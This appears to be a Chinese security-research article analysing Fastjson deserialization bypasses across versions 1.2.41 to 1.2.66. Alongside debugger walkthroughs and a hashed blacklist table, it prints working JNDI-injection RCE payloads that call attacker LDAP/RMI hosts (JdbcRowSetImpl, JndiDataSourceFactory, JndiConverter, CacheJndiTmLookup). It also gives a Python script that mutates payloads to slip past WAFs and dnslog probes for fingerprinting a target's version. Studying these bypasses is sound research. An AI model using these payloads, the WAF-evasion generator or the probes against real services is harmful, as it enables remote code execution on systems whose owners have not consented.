03.应用漏洞分析 - 04.Fastjson各版本漏洞分析 - 《Decentralized Alliance - 去中心化同盟》

前言
概念
演示代码
fastjson 1.2.24
fastjson 1.2.41
fastjson 1.2.42
fastjson 1.2.43
fastjson 1.2.45
fastjson 1.2.47
fastjson 1.2.62
fastjson 1.2.66
fastjson 1.2.68
fastjson黑名单
Payload转换
Fastjson姿势技巧集合
各版本利用
bypasswaf
参考链接

前言

最先出现问题的Fastjson 1.2.24反序列化漏洞已经分析过了，产生漏洞的原理也差不多理解了

在1.2.25之后的版本，以及所有的.sec01后缀版本中，autotype功能默认是受限的（黑白名单机制）
在1.2.68之后的版本，fastjson增加了safeMode的支持。配置safeMode后，无论白名单和黑名单，都不支持autoType

概念
可能出现一些新的概念，给一些参考链接吧
FastJSON为什么要有autoType功能
enable_autotype

演示代码

后面的分析代码都以此为基础修改

package org.example;
import com.alibaba.fastjson.JSON;
public class App {
  public static void main(String[] args) {
      String json = "{\"@type\":\"org.example.User\",\"age\":66,\"username\":\"test\"}";
      System.out.println(JSON.parseObject(json));
  }
}
class User {
  private String username;
  private int age;
  public void setUsername(String username) {
      this.username = username;
      System.out.println("call setUsername");
  }
  public String getUsername() {
      System.out.println("call getUsername");
      return username;
  }
  public void setAge(int age) {
      this.age = age;
      System.out.println("call setAge");
  }
  public int getAge() {
      return age;
  }
}

fastjson 1.2.24

之前已经分析过了，就不在写了

fastjson 1.2.41

利用的前提是必须要手动开启autoTypeSupport，不然还是不能利用，所以说还是有一点鸡肋吧从代码中开启autoTypeSupport

ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

在1.2.25之后的版本，以及所有的.sec01后缀版本中，增加了checkAutotype函数，autotype功能默认是受限的（黑白名单机制）
但在1.2.25到1.2.41之间，发生过一次checkAutotype的绕过。
Payload如下

{"@type":"Lorg.example.User;","age":66,"username":"test"}

我们用这个payload来分析一下如何绕过的（fastjson 1.2.41）
进入checkAutoType后，首先会对typeName的长度进行判断，很明显这个条件满足不了，所以不会抛出异常
04.Fastjson各版本漏洞分析 - 图1
继续向下，开启autoTypeSupport时，会先通过黑白名单来判断，先白名单后黑名单
04.Fastjson各版本漏洞分析 - 图2
很明显我们传入的typeName Lorg.example.User;肯定是不在黑名单内的，这是一个绕过的点
04.Fastjson各版本漏洞分析 - 图3
继续向下，如果clazz==null，就会调用TypeUtils.getClassFromMapping(typeName);，跟一下其实就是从一个ConcurrentHashMap中看看存不存在这个类，很明显我们传入的L开头的类是不会存在的
04.Fastjson各版本漏洞分析 - 图4
继续向下，和上面类似，我们这个类还是找不到的，所以clazz还是null
04.Fastjson各版本漏洞分析 - 图5
没开启autoTypeSupport的情况下，依然会进行黑白名单检测，先黑名单后白名单，我们这里手动开启了所以这里不管，因为会跳过
04.Fastjson各版本漏洞分析 - 图6
前面黑名单检测都没问题，就会开始加载这个类了
04.Fastjson各版本漏洞分析 - 图7
跟进loadClass，如果第一个字符是[，就会去掉[再去解析，我们这里不满足就先不看，继续向下
04.Fastjson各版本漏洞分析 - 图8
这个条件就是这次绕过的核心条件了

else if (className.startsWith("L") && className.endsWith(";")) {
    String newClassName = className.substring(1, className.length() - 1);
    return loadClass(newClassName, classLoader);
}

如果开头是L而且结尾是;，那么就会给前后这俩字符去掉，所以可以看到我们的newClassName就是我们想要的org.example.User
04.Fastjson各版本漏洞分析 - 图9
后续就会加载我们的类实例化，达到我们绕过的目的
04.Fastjson各版本漏洞分析 - 图10

debug过程中，可能大家注意到一个点，loadClass函数中，有一个条件，如果第一个字符是[，就会去掉[再去实例化，那这个地方是不是也能用来绕过呢？
答案是当然可以，这个绕过点就体现在1.2.43版本中

fastjson 1.2.42

1.2.41问题出现后，1.2.42中尝试了修复，修复方式

https://github.com/alibaba/fastjson/commit/e701faa2da7cff6d94394061bbff06a166c2aaaf
寻找历史commit技巧：
1. release里面找对应的版本的commit
2. 直接搜索commit
3. 直接搜索issue

可以明显的看到，给原来的denyList变成了denyHashCodes，让安全研究更难了，但是hashcode的方法是公开的，只要jar包够多还是可以碰撞出来的，感觉治标不治本。。。
04.Fastjson各版本漏洞分析 - 图11
同时可以看到针对漏洞绕过的修复方式，很简单粗暴，如果发现开头是L而且结尾是;，就直接去掉
04.Fastjson各版本漏洞分析 - 图12
所以绕过方式也很简单，直接用2个L和2个;就可以了，Payload如下

{"@type":"LLorg.example.User;;","age":66,"username":"test"}

fastjson 1.2.43

对LL;;可以绕过的情况做了过滤，如果只有一个L;，就去除了后再走黑名单去过滤看看是否允许反序列化，着实太恶心了看着
04.Fastjson各版本漏洞分析 - 图13
所以2个LL;;是行不通了，但是别忘了我们在分析1.2.41的时候，发现还会去掉[然后实例化，这就是绕过点
初始payload

{"@type":"[org.example.User","age":66,"username":"test"}

报错exepct '[', but ,, pos 29, json : {"@type":"[org.example.User","age":66,"username":"test"}，29那个位置，期望一个[，但是是,，所以我们加一个[

{"@type":"[org.example.User"[,"age":66,"username":"test"}

报错syntax error, expect {, actual string, pos 30, fastjson-version 1.2.43，期望30的位置是一个{，加上
最终POC

{"@type":"[org.example.User"[{,"age":66,"username":"test"}

看着有点迷，为啥加上[{就可以了？
分析一下，通过checkAutoType后，返回class [Lorg.example.User;
04.Fastjson各版本漏洞分析 - 图14
一直跟，发现调用了deserializer.deserialze，跟进去，发现使用了clazz.getComponentType()，是不是很眼熟？就是前面去掉[的那个地方
04.Fastjson各版本漏洞分析 - 图15
这个函数是native的，所以看不到代码。。。不过根据结果来看，就是去掉[L和;拿到类
04.Fastjson各版本漏洞分析 - 图16
再继续往下，跟进parseArray
04.Fastjson各版本漏洞分析 - 图17
发现如果token != 14就会抛出错误，而没有[的时候，token是16，所以会报错，{也类似，可以下个异常断点来分析
04.Fastjson各版本漏洞分析 - 图18
最后看下到setXXX的运行堆栈信息，结合堆栈来分析可以节约很多时间

setUsername:20, User (org.example)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
setValue:110, FieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:118, DefaultFieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:1061, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:756, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:271, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
parseArray:729, DefaultJSONParser (com.alibaba.fastjson.parser)
deserialze:183, ObjectArrayCodec (com.alibaba.fastjson.serializer)
parseObject:373, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1338, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1304, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:152, JSON (com.alibaba.fastjson)
parse:162, JSON (com.alibaba.fastjson)
parse:131, JSON (com.alibaba.fastjson)
parseObject:223, JSON (com.alibaba.fastjson)
main:10, App (org.example)

fastjson 1.2.45

1.2.44中对[进行了判断，我们用1.2.43的POC，然后下个JSONException的异常断点，看看是怎么判断的
运行后，在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class<?>, int)成功拦截
分析一下，发现如果开头是[就直接抛出异常
04.Fastjson各版本漏洞分析 - 图19
那再看看1.2.41里面的绕法呢，前面加个L，后面加个;，发现会检查结尾是否为;，是的话也抛出异常
04.Fastjson各版本漏洞分析 - 图20
当然这个版本既然有RCE，肯定不是之前的方法绕过的，这次是通过不在黑名单里面的类来绕过的

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://x.x.x.x/Exp"}}

fastjson 1.2.47

这个版本绕过了autoTypeSupport检测，不开启**ast**依然可以利用（1.2.25 - 1.2.45 这些绕过都是需要开启ast的）
Payload：

{
    "a":
    {
        "@type": "java.lang.Class",
        "val": "org.example.User"
    },
    "b":
    {
        "@type": "org.example.User",
        "username": "123456",
        "age": 123
    }
}

04.Fastjson各版本漏洞分析 - 图21
绕过原理：

利用到了java.lang.class，这个类不在黑名单，所以checkAutotype可以过
这个java.lang.class类对应的deserializer为MiscCodec，deserialize时会取json串中的val值并load这个val对应的class，如果fastjson cache为true，就会缓存这个val对应的class到全局map中
如果再次加载val名称的class，并且autotype没开启（因为开启了会先检测黑白名单，所以这个漏洞开启了反而不成功），下一步就是会尝试从全局map中获取这个class，如果获取到了，直接返回

debug分析：
在setXXX的地方下断点，运行看下调用堆栈信息

setUsername:28, User (org.example)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
setValue:110, FieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:124, DefaultFieldDeserializer (com.alibaba.fastjson.parser.deserializer)
parseField:1078, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:773, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:271, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
deserialze:267, JavaBeanDeserializer (com.alibaba.fastjson.parser.deserializer)
parseObject:384, DefaultJSONParser (com.alibaba.fastjson.parser)
parseObject:544, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:1322, DefaultJSONParser (com.alibaba.fastjson.parser)
parse:152, JSON (com.alibaba.fastjson)
parse:162, JSON (com.alibaba.fastjson)
parse:131, JSON (com.alibaba.fastjson)
parseObject:223, JSON (com.alibaba.fastjson)
main:20, App (org.example)

进入到parse:1356, DefaultJSONParser (com.alibaba.fastjson.parser)开始下断点重新运行分析
04.Fastjson各版本漏洞分析 - 图22
跟进，一直F8，识别到传入的参数a，继续向下，识别到后面还是{开头后，递归调用parseObject
04.Fastjson各版本漏洞分析 - 图23
继续往后识别到@type
04.Fastjson各版本漏洞分析 - 图24
然后就是进入checkAutoType检查，因为java.lang.Class在this.deserializers.buckets里面，所以直接返回了class java.lang.Class
04.Fastjson各版本漏洞分析 - 图25
通过了checkAutoType检查后，常规调用deserializer.deserialze进行反序列化，但这里是com.alibaba.fastjson.serializer.MiscCodec#deserialze
04.Fastjson各版本漏洞分析 - 图26
这里会取出我们的变量val的值，也是我们传入的恶意类
04.Fastjson各版本漏洞分析 - 图27
然后就是一系列的Class的判断，一直到Class.class，然后会进入loadClass
04.Fastjson各版本漏洞分析 - 图28
跟进loadClass，一直跟，发现在cache为true的时候，会直接给咱们的恶意类加入到mappings中，而这个mappings是不是看着很眼熟？后面分析
04.Fastjson各版本漏洞分析 - 图29
这个cache默认就是为true
04.Fastjson各版本漏洞分析 - 图30

然后开始处理字段b，和上面类似，我们一直到checkAutoType
可以看到此处如果开启了autoTypeSupport检查会进入黑名单检查，反而影响我们的payload
04.Fastjson各版本漏洞分析 - 图31
跟进下方的getClassFromMapping，可以看到就是上面我们添加恶意类的那个Mapping，从此绕过了checkAutoType检查
04.Fastjson各版本漏洞分析 - 图32
到此差不多就结束了，大佬就是大佬，太牛了

fastjson 1.2.62

1.2.47后肯定修复了，怎么修的呢？我们用1.2.62去试试1.2.47的POC
04.Fastjson各版本漏洞分析 - 图33
抛出了一场，然后下个异常断点，分析一下，看样子是前面某个地方设置了autoTypeSupport的值
04.Fastjson各版本漏洞分析 - 图34
咱们追踪一下这个变量，下个字段断点
04.Fastjson各版本漏洞分析 - 图35
发现来源是这
04.Fastjson各版本漏洞分析 - 图36
跟一下AUTO_SUPPORT，原来是从配置文件里面读是否开启了autoTypeSupport。。。大意了
04.Fastjson各版本漏洞分析 - 图37
那我们开启ast后再试试
结果就是java.lang.Class被加入到了黑名单
04.Fastjson各版本漏洞分析 - 图38
据说修复还将cache默认设置为false了，去TypeUtils类看看，发现确实如此
04.Fastjson各版本漏洞分析 - 图39

1.2.62的RCE也很简单，由于CVE-2020-8840的gadget绕过了fastjson的黑名单而导致的，当服务端存在收到漏洞影响的xbean-reflect依赖并且开启fastjson的autotype时，远程攻击者可以通过精心构造的请求包触发漏洞从而导致在服务端上造成远程命令执行的效果。

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://x.x.x.x/Exp"}

fastjson 1.2.66

和1.2.62类似，在开启AutoType的情况下，由于黑名单过滤不全而导致的绕过问题

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://x.x.x.x/Exp"}

fastjson 1.2.68

这个文档太大了太卡了，后面单独分析

fastjson黑名单

参考https://github.com/LeadroyaL/fastjson-blacklist

fastjson 在1.2.42开始，把原本明文的黑名单改成了哈希过的黑名单，防止安全研究者对其进行研究。在 https://github.com/alibaba/fastjson/commit/eebea031d4d6f0a079c3d26845d96ad50c3aaccd 这次commit中体现出来。
fastjson 在1.2.61开始，在https://github.com/alibaba/fastjson/commit/d1c0dff9a33d49e6e7b98a4063da01bbc9325a38中，把黑名单从十进制数变成了十六进制数，可能是为了防止安全研究者进行搜索
对照表

version	hash	hex-hash	name
1.2.42	-8720046426850100497	0x86fc2bf9beaf7aefL	org.apache.commons.collections4.comparators
1.2.42	-8109300701639721088	0x8f75f9fa0df03f80L	org.python.core
1.2.42	-7966123100503199569	0x9172a53f157930afL	org.apache.tomcat
1.2.42	-7766605818834748097	0x9437792831df7d3fL	org.apache.xalan
1.2.42	-6835437086156813536	0xa123a62f93178b20L	javax.xml
1.2.42	-4837536971810737970	0xbcdd9dc12766f0ceL	org.springframework.
1.2.42	-4082057040235125754	0xc7599ebfe3e72406L	org.apache.commons.beanutils
1.2.42	-2364987994247679115	0xdf2ddff310cdb375L	org.apache.commons.collections.Transformer
1.2.42	-1872417015366588117	0xe603d6a51fad692bL	org.codehaus.groovy.runtime
1.2.42	-254670111376247151	0xfc773ae20c827691L	java.lang.Thread
1.2.42	-190281065685395680	0xfd5bfc610056d720L	javax.net.
1.2.42	313864100207897507	0x45b11bc78a3aba3L	com.mchange
1.2.42	1203232727967308606	0x10b2bdca849d9b3eL	org.apache.wicket.util
1.2.42	1502845958873959152	0x14db2e6fead04af0L	java.util.jar.
1.2.42	3547627781654598988	0x313bb4abd8d4554cL	org.mozilla.javascript
1.2.42	3730752432285826863	0x33c64b921f523f2fL	java.rmi
1.2.42	3794316665763266033	0x34a81ee78429fdf1L	java.util.prefs.
1.2.42	4147696707147271408	0x398f942e01920cf0L	com.sun.
1.2.42	5347909877633654828	0x4a3797b30328202cL	java.util.logging.
1.2.42	5450448828334921485	0x4ba3e254e758d70dL	org.apache.bcel
1.2.42	5751393439502795295	0x4fd10ddc6d13821fL	java.net.Socket
1.2.42	5944107969236155580	0x527db6b46ce3bcbcL	org.apache.commons.fileupload
1.2.42	6742705432718011780	0x5d92e6ddde40ed84L	org.jboss
1.2.42	7179336928365889465	0x63a220e60a17c7b9L	org.hibernate
1.2.42	7442624256860549330	0x6749835432e0f0d2L	org.apache.commons.collections.functors
1.2.42	8838294710098435315	0x7aa7ee3627a19cf3L	org.apache.myfaces.context.servlet
1.2.43	-2262244760619952081	0xe09ae4604842582fL	java.net.URL
1.2.46	-8165637398350707645	0x8eadd40cb2a94443L	junit.
1.2.46	-8083514888460375884	0x8fd1960988bce8b4L	org.apache.ibatis.datasource
1.2.46	-7921218830998286408	0x92122d710e364fb8L	org.osjava.sj.
1.2.46	-7768608037458185275	0x94305c26580f73c5L	org.apache.log4j.
1.2.46	-6179589609550493385	0xaa3daffdb10c4937L	org.logicalcobwebs.
1.2.46	-5194641081268104286	0xb7e8ed757f5d13a2L	org.apache.logging.
1.2.46	-3935185854875733362	0xc963695082fd728eL	org.apache.commons.dbcp
1.2.46	-2753427844400776271	0xd9c9dbf6bbd27bb1L	com.ibatis.sqlmap.engine.datasource
1.2.46	-1589194880214235129	0xe9f20bad25f60807L	org.jdom.
1.2.46	1073634739308289776	0xee6511b66fd5ef0L	org.slf4j.
1.2.46	5688200883751798389	0x4ef08c90ff16c675L	javassist.
1.2.46	7017492163108594270	0x616323f12c2ce25eL	oracle.net
1.2.46	8389032537095247355	0x746bd4a53ec195fbL	org.jaxen.
1.2.48	1459860845934817624	0x144277b467723158L	java.net.InetAddress
1.2.48	8409640769019589119	0x74b50bb9260e31ffL	java.lang.Class
1.2.49	4904007817188630457	0x440e89208f445fb9L	com.alibaba.fastjson.annotation
1.2.59	5100336081510080343	0x46c808a4b5841f57L	org.apache.cxf.jaxrs.provider.
1.2.59	6456855723474196908	0x599b5c1213a099acL	ch.qos.logback.
1.2.59	8537233257283452655	0x767a586a5107feefL	net.sf.ehcache.transaction.manager.
1.2.60	3688179072722109200	0x332f0b5369a18310L	com.zaxxer.hikari.
1.2.61	-4401390804044377335	0xc2eb1e621f439309L	flex.messaging.util.concurrent.AsynchBeansWorkManagerExecutor
1.2.61	-1650485814983027158	0xe9184be55b1d962aL	org.apache.openjpa.ee.
1.2.61	-1251419154176620831	0xeea210e8da2ec6e1L	oracle.jdbc.rowset.OracleJDBCRowSet
1.2.61	-9822483067882491	0xffdd1a80f1ed3405L	com.mysql.cj.jdbc.admin.
1.2.61	99147092142056280	0x1603dc147a3e358L	oracle.jdbc.connector.OracleManagedConnectionFactory
1.2.61	3114862868117605599	0x2b3a37467a344cdfL	org.apache.ibatis.parsing.
1.2.61	4814658433570175913	0x42d11a560fc9fba9L	org.apache.axis2.jaxws.spi.handler.
1.2.61	6511035576063254270	0x5a5bd85c072e5efeL	jodd.db.connection.
1.2.61	8925522461579647174	0x7bddd363ad3998c6L	org.apache.commons.configuration.JNDIConfiguration
1.2.62	-9164606388214699518	0x80d0c70bcc2fea02L	org.apache.ibatis.executor.
1.2.62	-8649961213709896794	0x87f52a1b07ea33a6L	net.sf.cglib.
1.2.62	-6316154655839304624	0xa85882ce1044c450L	oracle.net.
1.2.62	-5764804792063216819	0xafff4c95b99a334dL	com.mysql.cj.jdbc.MysqlDataSource
1.2.62	-4608341446948126581	0xc00be1debaf2808bL	jdk.internal.
1.2.62	-4438775680185074100	0xc2664d0958ecfe4cL	aj.org.objectweb.asm.
1.2.62	-3319207949486691020	0xd1efcdf4b3316d34L	oracle.jdbc.
1.2.62	-2192804397019347313	0xe1919804d5bf468fL	org.apache.commons.collections.comparators.
1.2.62	-2095516571388852610	0xe2eb3ac7e56c467eL	net.sf.ehcache.hibernate.
1.2.62	4750336058574309	0x10e067cd55c5e5L	com.mysql.cj.log.
1.2.62	218512992947536312	0x3085068cb7201b8L	org.h2.jdbcx.
1.2.62	823641066473609950	0xb6e292fa5955adeL	org.apache.commons.logging.
1.2.62	1534439610567445754	0x154b6cb22d294cfaL	org.apache.ibatis.reflection.
1.2.62	1818089308493370394	0x193b2697eaaed41aL	org.h2.server.
1.2.62	2164696723069287854	0x1e0a8c3358ff3daeL	org.apache.ibatis.datasource.
1.2.62	2653453629929770569	0x24d2f6048fef4e49L	org.objectweb.asm.
1.2.62	2836431254737891113	0x275d0732b877af29L	flex.messaging.util.concurrent.
1.2.62	3089451460101527857	0x2adfefbbfe29d931L	org.apache.ibatis.javassist.
1.2.62	3256258368248066264	0x2d308dbbc851b0d8L	java.lang.UNIXProcess
1.2.62	3718352661124136681	0x339a3e0b6beebee9L	org.apache.ibatis.ognl.
1.2.62	4046190361520671643	0x3826f4b2380c8b9bL	com.mysql.cj.jdbc.MysqlConnectionPoolDataSource
1.2.62	4841947709850912914	0x43320dc9d2ae0892L	org.codehaus.jackson.
1.2.62	6280357960959217660	0x5728504a6d454ffcL	org.apache.ibatis.scripting.
1.2.62	6534946468240507089	0x5ab0cb3071ab40d1L	org.apache.commons.proxy.
1.2.62	6734240326434096246	0x5d74d3e5b9370476L	com.mysql.cj.jdbc.MysqlXADataSource
1.2.62	7123326897294507060	0x62db241274397c34L	org.apache.commons.collections.functors.
1.2.62	8488266005336625107	0x75cc60f5871d0fd3L	org.apache.commons.configuration
1.2.66	-2439930098895578154	0xde23a0809a8b9bd6L	javax.script.
1.2.66	-582813228520337988	0xf7e96e74dfa58dbcL	javax.sound.
1.2.66	-26639035867733124	0xffa15bf021f1e37cL	javax.print.
1.2.66	386461436234701831	0x55cfca0f2281c07L	javax.activation.
1.2.66	1153291637701043748	0x100150a253996624L	javax.tools.
1.2.66	1698504441317515818L	0x17924cca5227622aL	javax.management.
1.2.66	7375862386996623731L	0x665c53c311193973L	org.apache.xbean.
1.2.66	7658177784286215602L	0x6a47501ebb2afdb2L	org.eclipse.jetty.
1.2.66	8055461369741094911L	0x6fcabf6fa54cafffL	javax.naming.
1.2.67	-7775351613326101303L	0x941866e73beff4c9L	org.apache.shiro.realm.
1.2.67	-6025144546313590215L	0xac6262f52c98aa39L	org.apache.http.conn.
1.2.67	-5939269048541779808L	0xad937a449831e8a0L	org.quartz.
1.2.67	-5885964883385605994L	0xae50da1fad60a096L	com.taobao.eagleeye.wrapper
1.2.67	-3975378478825053783L	0xc8d49e5601e661a9L	org.apache.http.impl.
1.2.67	-2378990704010641148L	0xdefc208f237d4104L	com.ibatis.
1.2.67	-905177026366752536L	0xf3702a4a5490b8e8L	org.apache.catalina.
1.2.67	2660670623866180977L	0x24ec99d5e7dc5571L	org.apache.http.auth.
1.2.67	2731823439467737506L	0x25e962f1c28f71a2L	br.com.anteros.
1.2.67	3637939656440441093L	0x327c8ed7c8706905L	com.caucho.
1.2.67	4254584350247334433L	0x3b0b51ecbf6db221L	org.apache.http.cookie.
1.2.67	5274044858141538265L	0x49312bdafb0077d9L	org.javasimon.
1.2.67	5474268165959054640L	0x4bf881e49d37f530L	org.apache.cocoon.
1.2.67	5596129856135573697L	0x4da972745feb30c1L	org.apache.activemq.jms.pool.
1.2.67	6854854816081053523L	0x5f215622fb630753L	org.mortbay.jetty.
1.2.68	-3077205613010077203L	0xd54b91cc77b239edL	org.apache.shiro.jndi.
1.2.68	-2825378362173150292L	0xd8ca3d595e982bacL	org.apache.ignite.cache.jta.
1.2.68	2078113382421334967L	0x1cd6f11c6a358bb7L	javax.swing.J
1.2.68	6007332606592876737L	0x535e552d6f9700c1L	org.aoju.bus.proxy.provider.
1.2.68	9140390920032557669L	0x7ed9311d28bf1a65L	java.awt.p
1.2.68	9140416208800006522L	0x7ed9481d28bf417aL	java.awt.i
1.2.69	-8024746738719829346L	0x90a25f5baa21529eL	java.io.Serializable
1.2.69	-5811778396720452501L	0xaf586a571e302c6bL	java.io.Closeable
1.2.69	-3053747177772160511L	0xd59ee91f0b09ea01L	oracle.jms.AQ
1.2.69	-2114196234051346931L	0xe2a8ddba03e69e0dL	java.util.Collection
1.2.69	-2027296626235911549L	0xe3dd9875a2dc5283L	java.lang.Iterable
1.2.69	-2939497380989775398L	0xd734ceb4c3e9d1daL	java.lang.Object
1.2.69	-1368967840069965882L	0xed007300a7b227c6L	java.lang.AutoCloseable
1.2.69	2980334044947851925L	0x295c4605fd1eaa95L	java.lang.Readable
1.2.69	3247277300971823414L	0x2d10a5801b9d6136L	java.lang.Cloneable
1.2.69	5183404141909004468L	0x47ef269aadc650b4L	java.lang.Runnable
1.2.69	7222019943667248779L	0x6439c4dff712ae8bL	java.util.EventListener
1.2.70	-5076846148177416215L	0xb98b6b5396932fe9L	org.apache.commons.collections4.Transformer
1.2.70	-4703320437989596122L	0xbeba72fb1ccba426L	org.apache.commons.collections4.functors
1.2.70	-4314457471973557243L	0xc41ff7c9c87c7c05L	org.jdom2.transform.
1.2.70	-2533039401923731906L	0xdcd8d615a6449e3eL	org.apache.hadoop.shaded.com.zaxxer.hikari.
1.2.70	156405680656087946L	0x22baa234c5bfb8aL	com.p6spy.engine.
1.2.70	1214780596910349029L	0x10dbc48446e0dae5L	org.apache.activemq.pool.
1.2.70	3085473968517218653L	0x2ad1ce3a112f015dL	org.apache.aries.transaction.
1.2.70	3129395579983849527L	0x2b6dd8b3229d6837L	org.apache.activemq.ActiveMQConnectionFactory
1.2.70	4241163808635564644L	0x3adba40367f73264L	org.apache.activemq.spring.
1.2.70	7240293012336844478L	0x647ab0224e149ebeL	org.apache.activemq.ActiveMQXAConnectionFactory
1.2.70	7347653049056829645L	0x65f81b84c1d920cdL	org.apache.commons.jelly.
1.2.70	7617522210483516279L	0x69b6e0175084b377L	org.apache.axis2.transport.jms.
1.2.71	-4537258998789938600L	0xc1086afae32e6258L	java.io.FileReader
1.2.71	-4150995715611818742L	0xc664b363baca050aL	java.io.ObjectInputStream
1.2.71	-2995060141064716555L	0xd66f68ab92e7fef5L	java.io.FileInputStream
1.2.71	-965955008570215305L	0xf2983d099d29b477L	java.io.ObjectOutputStream
1.2.71	-219577392946377768L	0xfcf3e78644b98bd8L	java.io.DataOutputStream
1.2.71	2622551729063269307L	x24652ce717e713bbL	java.io.PrintWriter
1.2.71	2930861374593775110L	0x28ac82e44e933606L	java.io.Buffered
1.2.71	4000049462512838776L	0x378307cb0111e878L	java.io.InputStreamReader
1.2.71	4193204392725694463L	0x3a31412dbb05c7ffL	java.io.OutputStreamWriter
1.2.71	5545425291794704408L	0x4cf54eec05e3e818L	java.io.FileWriter
1.2.71	6584624952928234050L	0x5b6149820275ea42L	java.io.FileOutputStream
1.2.71	7045245923763966215L	0x61c5bdd721385107L	java.io.DataInputStream

Payload转换

有些使用了存在漏洞的fastjson版本，但是有WAF在外面，所以抄了一个师傅的脚本

#!usr/bin/env python  
# -*- coding:utf-8 -*-
""" 
@author: longofo
@file: fastjson_fuzz.py 
@time: 2020/05/07 
"""
import json
from json import JSONDecodeError
class FastJsonPayload:
    def __init__(self, base_payload):
        try:
            json.loads(base_payload)
        except JSONDecodeError as ex:
            raise ex
        self.base_payload = base_payload
    def gen_common(self, payload, func):
        tmp_payload = json.loads(payload)
        dct_objs = [tmp_payload]
        while len(dct_objs) > 0:
            tmp_objs = []
            for dct_obj in dct_objs:
                for key in dct_obj:
                    if key == "@type":
                        dct_obj[key] = func(dct_obj[key])
                    if type(dct_obj[key]) == dict:
                        tmp_objs.append(dct_obj[key])
            dct_objs = tmp_objs
        return json.dumps(tmp_payload)
    # 对@type的value增加L开头，;结尾的payload
    def gen_payload1(self, payload: str):
        return self.gen_common(payload, lambda v: "L" + v + ";")
    # 对@type的value增加LL开头，;;结尾的payload
    def gen_payload2(self, payload: str):
        return self.gen_common(payload, lambda v: "LL" + v + ";;")
    # 对@type的value进行\u
    def gen_payload3(self, payload: str):
        return self.gen_common(payload,
                               lambda v: ''.join('\\u{:04x}'.format(c) for c in v.encode())).replace("\\\\", "\\")
    # 对@type的value进行\x
    def gen_payload4(self, payload: str):
        return self.gen_common(payload,
                               lambda v: ''.join('\\x{:02x}'.format(c) for c in v.encode())).replace("\\\\", "\\")
    # 生成cache绕过payload
    def gen_payload5(self, payload: str):
        cache_payload = {
            "rand1": {
                "@type": "java.lang.Class",
                "val": "com.sun.rowset.JdbcRowSetImpl"
            }
        }
        cache_payload["rand2"] = json.loads(payload)
        return json.dumps(cache_payload)
    def gen(self):
        payloads = []
        payload1 = self.gen_payload1(self.base_payload)
        yield payload1
        payload2 = self.gen_payload2(self.base_payload)
        yield payload2
        payload3 = self.gen_payload3(self.base_payload)
        yield payload3
        payload4 = self.gen_payload4(self.base_payload)
        yield payload4
        payload5 = self.gen_payload5(self.base_payload)
        yield payload5
        payloads.append(payload1)
        payloads.append(payload2)
        payloads.append(payload5)
        for payload in payloads:
            yield self.gen_payload3(payload)
            yield self.gen_payload4(payload)
if __name__ == '__main__':
    fjp = FastJsonPayload('''{
  "rand1": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://localhost:1389/Object",
    "autoCommit": true
  }
}''')
    for payload in fjp.gen():
        print(payload)
        print()

04.Fastjson各版本漏洞分析 - 图40

Fastjson姿势技巧集合

https://github.com/safe6Sec/Fastjson

做个备份，怕删了

# Fastjson
Fastjson姿势技巧集合
## 说明
2021.8.10 小弟水平有限，1.2.48之后高版本漏洞成因还未进行研究探索，很多利用细节和注意事项都不够完整，待我有空慢慢补充。
## 探测
用来探测目标版本，才能更好确定使用的payload。还可以用来区分fastjson和Jackjson。   
fastjson探测版本，还可以用错误格式的json发过去。如果对方异常未处理可报出详细版本。   
主要是利用各个类被加入黑名单的方式进行判断
fastjson >1.2.43
```java
{"@type":"java.net.URL","val":"dnslog"}

fastjson >1.2.48

{"@type":"java.net.InetAddress","val":"dnslog"}

fastjson >1.2.68

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
Set[{"@type":"java.net.URL","val":"http://dnslog"}]
Set[{"@type":"java.net.URL","val":"http://dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{{"@type":"java.net.URL","val":"http://dnslog"}:0

各版本利用

除了考虑Fastjson版本，还得考虑JDK版本，中间件版本，第三方依赖版本。 JDK版本对于JDNI注入的限制，基于RMI利用的JDK版本<=6u141、7u131、8u121，基于LDAP利用的JDK版本<=6u211、7u201、8u191。（更高版本也有绕过）
更高版本绕过可用https://github.com/veracode-research/rogue-jndi

jndi
1. JdbcRowSetImpl
2. C3p0#JndiRefForwardingDataSource
3. JndiDataSourceFactory
bcel
1. tomcat#dbcp
2. ibatis
TemplatesImpl

Fastjson 1.2.22-1.2.24

JdbcRowSetImpl

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName", "autoCommit":true}

c3p0#JndiRefForwardingDataSource

JdbcRowSetImpl无法成功可以一试

